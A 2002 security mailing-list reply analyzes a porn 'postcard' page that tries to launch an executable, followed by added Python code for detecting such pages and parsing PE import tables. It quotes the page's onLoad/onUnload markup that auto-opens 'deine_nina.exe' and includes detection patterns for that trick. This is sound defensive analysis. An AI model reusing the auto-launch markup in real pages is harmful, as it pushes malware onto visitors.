[Dshield] Weird German Porn Spam?

John Sage jsage at finchhaven.com
Mon Nov 18 05:35:49 GMT 2002


Brenna:

On Sun, Nov 17, 2002 at 06:08:47PM -0600, Brenna Primrose wrote:
> I received a suspicious "postcard" e-mail today, and thinking it might
> be something similar to the recent "FriendGreetings" scam, I decided to
> check it out.  I first followed the link using IE 6, but it came up with
> an error.  I then opened it in Opera 6.05 and viewed the source, which
> redirects to http://nina.xfiles24.com.futuresite.register.com/
> (216.21.224.200) - some sort of a porno-looking card.  The card is
> linked to an executable hosted on netmails.com.  I don't accept popups
> in either of these browsers by default, but it looks as if a javascript
> on this page attempts to automatically launch an .exe: 
> 
> <!--
> function MM_openBrWindow(theURL,winName,features) { //v2.0
>   window.open(theURL,winName,features);
> }
> //-->
> </script>
> </HEAD>
> <BODY vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
> onUnload="MM_openBrWindow('deine_nina.exe','','')"
> onLoad="MM_openBrWindow('deine_nina.exe','','')">

Here's strings run against deine_nina.exe:

<snip>
wan-mini
port (pptp)
l2dsK
lkarallel>
schluss (direkt
9675modem
<snip>
1)No 
ISDN DEVICE cul
<snip>
2;46:43:4;;
3;6\7:#
SwedenDanmark
m7Belgium
<snip>
ado o
_wzur'AOL
<snip>
@LoadLibrary
lRrcf
vX	p)
Modu
tiBy
o1deChj(
InfoA
RegOpenKey
QueMV)
<snip>
KERNEL32.DLL
ADVAPI32.dll
MFC42.DLL
MSVCRT.dll
ole32.dll
SHELL32.dll
USER32.dll
LoadLibraryA
GetProcAddress
ExitProcess
RegCloseKey
exit
CoInitialize
ShellExecuteA
DrawIcon


objdump dumps core on deine_nina.exe, but:

[toot at sparky /home/www/html/sys_docs/virii]# objdump -x deine_nina.exe 
deine_nina.exe:     file format efi-app-ia32
deine_nina.exe
architecture: i386, flags 0x0000010a:
EXEC_P, HAS_DEBUG, D_PAGED
start address 0x0042fdf0

Characteristics 0x10f
	relocations stripped
	executable
	line numbers stripped
	symbols stripped
	32 bit words

Time/Date		Tue Jul 30 05:54:51 2002

ImageBase		00400000
SectionAlignment	00001000
FileAlignment		00000200
MajorOSystemVersion	4
MinorOSystemVersion	0
MajorImageVersion	0
MinorImageVersion	0
MajorSubsystemVersion	4
MinorSubsystemVersion	0
Win32Version		00000000
SizeOfImage		00032000
SizeOfHeaders		00000400
CheckSum		00000000
Subsystem		00000002	(Windows GUI)
DllCharacteristics	00000000
SizeOfStackReserve	00100000
SizeOfStackCommit	00001000
SizeOfHeapReserve	00100000
SizeOfHeapCommit	00001000
LoaderFlags		00000000
NumberOfRvaAndSizes	00000010

The Data Directory
Entry 0 00000000 00000000 Export Directory [.edata (or where ever we found it)]
Entry 1 00031794 0000019c Import Directory [parts of .idata]
Entry 2 00030000 00001794 Resource Directory [.rsrc]
Entry 3 00000000 00000000 Exception Directory [.pdata]
Entry 4 00000000 00000000 Security Directory
Entry 5 00000000 00000000 Base Relocation Directory [.reloc]
Entry 6 00000000 00000000 Debug Directory
Entry 7 00000000 00000000 Description Directory
Entry 8 00000000 00000000 Special Directory
Entry 9 00000000 00000000 Thread Storage Directory [.tls]
Entry a 00000000 00000000 Load Configuration Directory
Entry b 00000000 00000000 Bound Import Directory
Entry c 00000000 00000000 Import Address Table Directory
Entry d 00000000 00000000 Delay Import Directory
Entry e 00000000 00000000 Reserved
Entry f 00000000 00000000 Reserved

There is an import table in .rsrc at 0x431794

The Import Tables (interpreted .rsrc section contents)
 vma:            Hint    Time      Forward  DLL       First
                 Table   Stamp     Chain    Name      Thunk
 00031794	00000000 00000000 00000000 00031874 00031834

	DLL Name: KERNEL32.DLL
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
	318c4	    0  LoadLibraryA
	318d2	    0  GetProcAddress
	318e2	    0  ExitProcess

 000317a8	00000000 00000000 00000000 00031881 00031844

	DLL Name: ADVAPI32.dll
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
	318f0	    0  RegCloseKey

 000317bc	00000000 00000000 00000000 0003188e 0003184c

	DLL Name: MFC42.DLL
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
Segmentation fault (core dumped)



Googling on "advapi32.dll" is interesting; it seems to be involved
with Registry manipulation:

http://www.experts-exchange.com/Programming/Programming_Languages/Visual_Basic/Q_10543542.html

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKEY As
Long) As Long

Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias
"RegCreateKeyExA" (ByVal HKEY As Long, ByVal lpSubKey As String, ByVal
Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long,
ByVal samDesired As Long, ByVal lpSecurityAttributes As Long,
phkResult As Long, lpdwDisposition As Long) As Long

Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias
"RegDeleteKeyA" (ByVal HKEY As Long, ByVal lpSubKey As String) As Long

Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias
"RegDeleteValueA" (ByVal HKEY As Long, ByVal lpValueName As String) As
Long

Private Declare Function RegEnumKeyEx Lib "advapi32.dll" Alias
"RegEnumKeyExA" (ByVal HKEY As Long, ByVal dwIndex As Long, ByVal
lpName As String, lpcbName As Long, lpReserved As Long, ByVal lpClass
As String, lpcbClass As Long, lpftLastWriteTime As FILETIME) As Long

Private Declare Function RegEnumValue Lib "advapi32.dll" Alias
"RegEnumValueA" (ByVal HKEY As Long, ByVal dwIndex As Long, ByVal
lpValueName As String, lpcbValueName As Long, ByVal lpReserved As
Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As
Long

Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias
"RegOpenKeyExA" (ByVal HKEY As Long, ByVal lpSubKey As String, ByVal
ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As
Long

Private Declare Function RegQueryValueExString Lib "advapi32.dll"
Alias "RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As
String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As
String, lpcbData As Long) As Long

Private Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias
"RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As
Long) As Long

Private Declare Function RegQueryValueExBinary Lib "advapi32.dll"
Alias "RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As
String, ByVal lpReserved As Long, lpType As Long, lpData As Long,
lpcbData As Long) As Byte

Private Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias
"RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long,
lpcbData As Long) As Long

Private Declare Function RegSetValueExString Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String,
ByVal cbData As Long) As Long

Private Declare Function RegSetValueExLong Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal
cbData As Long) As Long

Private Declare Function RegSetValueExBinary Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, lpValue() As Byte, ByVal
cbData As Long) As Long
<snip>



Fun stuff, huh?


- John
-- 
Forest: a collection of trees

    PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
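The auto-launch trick Brenna describes above (an onLoad/onUnload handler that hands an .exe to a thin wrapper around window.open) is easy to check for mechanically. The following is an added example, my code rather than anything from the post or from the card page: a small heuristic scanner that first finds script functions whose body calls window.open(), then flags inline event handlers that pass an executable-looking name to one of them. The sample HTML is reconstructed from the quoted fragment with assumed opening tags and an added benign onclick link as a negative case; the extension list and the set of "automatic" events are my own choices.

```python
import re

# Heuristic patterns for the markup the card page used: a <script> defining a thin
# window.open() wrapper, and on<event>= attributes that call it with an executable.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
FUNC_DEF_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{(.*?)\}", re.S)
HANDLER_RE = re.compile(r"\bon(\w+)\s*=\s*([\"'])(.*?)\2", re.I | re.S)
CALL_RE = re.compile(r"\b([\w.]+)\s*\(\s*([\"'])([^\"']*)\2")
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")   # assumed list
AUTO_EVENTS = {"load", "unload", "beforeunload"}   # fire with no user action at all


def window_open_wrappers(html):
    """window.open itself plus every script-defined function whose body calls it."""
    names = {"window.open"}
    for script in SCRIPT_RE.findall(html):
        for name, body in FUNC_DEF_RE.findall(script):   # one-level bodies only
            if "window.open" in body:
                names.add(name)
    return names


def find_auto_launch(html):
    """(event, callee, target) for each inline handler that opens an executable."""
    wrappers = window_open_wrappers(html)
    hits = []
    for event, _, code in HANDLER_RE.findall(html):
        for callee, _, target in CALL_RE.findall(code):
            if callee in wrappers and target.lower().endswith(EXECUTABLE_EXT):
                hits.append((event.lower(), callee, target))
    return hits


def is_drive_by(html):
    """True when an executable is launched from an event the user never triggers."""
    return any(event in AUTO_EVENTS for event, _, _ in find_auto_launch(html))


# Constructed sample: the fragment quoted in the post, wrapped in the <html>/<script>
# opening tags the quote omits, plus a benign onclick link as a negative case.
SAMPLE_HTML = """<html><head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
onUnload="MM_openBrWindow('deine_nina.exe','','')"
onLoad="MM_openBrWindow('deine_nina.exe','','')">
<a href="card.html" onclick="window.open('card.html','card','width=400')">card</a>
</body></html>"""

if __name__ == "__main__":
    for event, callee, target in find_auto_launch(SAMPLE_HTML):
        print("on%s -> %s(%r)" % (event, callee, target))
    print("drive-by:", is_drive_by(SAMPLE_HTML))
```

The wrapper resolution matters: a check that only greps for `window.open(` next to `.exe` misses this page entirely, because the handler names `MM_openBrWindow` and the executable name only meets `window.open` inside the function body. The regexes are a triage heuristic, not a JavaScript parser; nested braces or string-built URLs will slip past them.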




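objdump above got through the KERNEL32.DLL and ADVAPI32.dll descriptors and then segfaulted on the MFC42.DLL entry, so here is an added example (my code, not John's and not GNU binutils) of walking the same structures by hand with Python's struct module: DOS header, COFF header, PE32 optional header, data directories, section table, and the import descriptors with their hint/name thunks. The image it parses is constructed in build_sample_pe(): it reuses the header values objdump printed (ImageBase 0x400000, entry point 0x42fdf0, Characteristics 0x10f, Subsystem 2, an import table that lives in a section named .rsrc) and the first two DLLs from the listing, but it is not deine_nina.exe and contains no code. The TimeDateStamp is my assumption of the printed date taken as UTC.

```python
import struct
from datetime import datetime, timezone

# PE32 optional header, fixed part (96 bytes); the 16 data directories follow it.
OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6


def build_sample_pe():
    """Constructed PE32 image (not deine_nina.exe): header values copied from the
    objdump listing, import table placed in a section named .rsrc."""
    imports = [("KERNEL32.DLL", ["LoadLibraryA", "GetProcAddress", "ExitProcess"]),
               ("ADVAPI32.dll", ["RegCloseKey"])]
    sec_rva, sec_off = 0x1000, 0x400
    body = bytearray(20 * (len(imports) + 1))          # descriptor array + null terminator
    descs = b""
    for dll, funcs in imports:
        name_rvas = []
        for f in funcs:                                 # hint/name entries, word aligned
            name_rvas.append(sec_rva + len(body))
            body += struct.pack("<H", 0) + f.encode() + b"\0" * (2 - len(f) % 2)
        dll_rva = sec_rva + len(body)
        body += dll.encode() + b"\0" * (4 - len(dll) % 4)
        thunks = b"".join(struct.pack("<I", r) for r in name_rvas) + b"\0" * 4
        int_rva = sec_rva + len(body); body += thunks   # Import Name Table
        iat_rva = sec_rva + len(body); body += thunks   # Import Address Table (unbound)
        descs += struct.pack("<IIIII", int_rva, 0, 0, dll_rva, iat_rva)
    body[:len(descs)] = descs
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew: PE header at 0x40
    # Machine i386, 1 section, assumed stamp for 2002-07-30 05:54:51 UTC, opt hdr 224, 0x10f
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 1028008491, 0, 0, 224, 0x10F)
    opt = struct.pack(OPT_FMT, 0x10B, 6, 0, 0, 0, 0, 0x2FDF0, 0x1000, 0x1000, 0x400000,
                      0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x32000, 0x400, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1] = (sec_rva, 20 * (len(imports) + 1))        # Entry 1: Import Directory
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".rsrc", len(body), sec_rva, 0x200, sec_off,
                       0, 0, 0, 0, 0x40000040)
    headers = (dos + coff + opt + sect).ljust(sec_off, b"\0")
    return bytes(headers + body.ljust(0x200, b"\0"))


def parse_pe(data):
    """Hand-rolled reader for what `objdump -x` printed, plus the import table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    o = struct.unpack_from(OPT_FMT, data, opt_off)
    if o[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry, image_base, subsystem, n_dirs = o[6], o[9], o[22], o[29]
    dirs = [struct.unpack_from("<II", data, opt_off + 96 + 8 * i) for i in range(n_dirs)]
    sections = [struct.unpack_from("<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
                for i in range(nsec)]

    def rva_to_off(rva):                 # file offset for an RVA, via the section table
        for _, vsize, va, rawsize, rawptr, *_ in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + rawptr
        raise ValueError("RVA 0x%x is outside every section" % rva)

    def cstr(off):
        return data[off:data.index(b"\0", off)].decode("ascii", "replace")

    imports = {}
    imp_rva = dirs[1][0] if len(dirs) > 1 else 0
    off = rva_to_off(imp_rva) if imp_rva else None
    while off is not None:
        int_rva, _, _, name_rva, iat_rva = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0:                # null descriptor terminates the array
            break
        funcs, thunk = [], rva_to_off(int_rva or iat_rva)   # INT may be absent
        while (t := struct.unpack_from("<I", data, thunk)[0]) != 0:
            funcs.append("ordinal#%d" % (t & 0xFFFF) if t & 0x80000000
                         else cstr(rva_to_off(t) + 2))      # skip the 2-byte hint
            thunk += 4
        imports[cstr(rva_to_off(name_rva))] = funcs
        off += 20
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "image_base": image_base, "entry": image_base + entry, "subsystem": subsystem,
            "sections": [s[0].rstrip(b"\0").decode() for s in sections],
            "import_dir": dirs[1] if len(dirs) > 1 else (0, 0), "imports": imports}


def report(info):
    """Render the fields in roughly objdump's layout."""
    when = datetime.fromtimestamp(info["timestamp"], timezone.utc).strftime("%a %b %d %H:%M:%S %Y")
    lines = ["start address 0x%08x" % info["entry"],
             "Characteristics 0x%x" % info["characteristics"],
             "Time/Date %s (UTC)" % when,
             "Subsystem %d (%s)" % (info["subsystem"],
                                    {2: "Windows GUI", 3: "Windows CUI"}.get(info["subsystem"], "other")),
             "Import Directory rva 0x%08x size 0x%08x" % info["import_dir"]]
    for dll, funcs in info["imports"].items():
        lines.append("DLL Name: %s" % dll)
        lines.extend("    %s" % f for f in funcs)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(parse_pe(build_sample_pe())))
```

Against a real file it is `parse_pe(open(path, "rb").read())`. The import list is the part worth having: `strings` already hinted at ShellExecuteA and RegOpenKey, but a parsed import table tells you which DLL each name belongs to and does not mix in stray text from the resource section. Limits: PE32 only (PE32+ has a different optional header and is rejected), ordinal imports come back as `ordinal#N`, and bound or forwarded imports are not resolved.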